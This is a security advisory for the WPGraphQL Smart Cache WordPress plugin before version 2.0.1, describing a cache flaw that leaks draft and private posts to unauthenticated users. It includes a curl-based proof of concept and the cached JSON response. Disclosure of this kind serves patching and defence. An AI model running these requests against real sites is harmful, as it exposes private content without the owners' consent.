WPGraphQL Smart Cache < 2.0.1 – Unauthenticated Private Content Disclosure

Description

The plugin incorrectly cache authenticated user data (such as draft posts, private content, or other permission-restricted data), which could allow unauthenticated users to then access it

Proof of Concept

curl -i 'https:/vulnerable-site/graphql/?query={posts(where:{status:DRAFT}){nodes{title status}}}' -b 'wordpress_logged_in_xxxxx=redacted'
 
# Receive back body that will be written to object cache / memcache
{
  "data": {
    "posts": {
      "nodes": [
        {"title": "Test Post", "status": "draft"},
      ]
    }
  },
  "extensions": {
    "debug": [
      {
        "type": "DEBUG_LOGS_INACTIVE",
        "message": "GraphQL Debug logging is not active. To see debug logs, GRAPHQL_DEBUG must be enabled."
      }
    ],
    "graphqlSmartCache": {
      "graphqlObjectCache": []
    }
  }
}
 
# Now make same request without auth / logged in cookie and you'll receive same response body
curl -i 'https:/vulnerable-site/graphql/?query={posts(where:{status:DRAFT}){nodes{title status}}}D'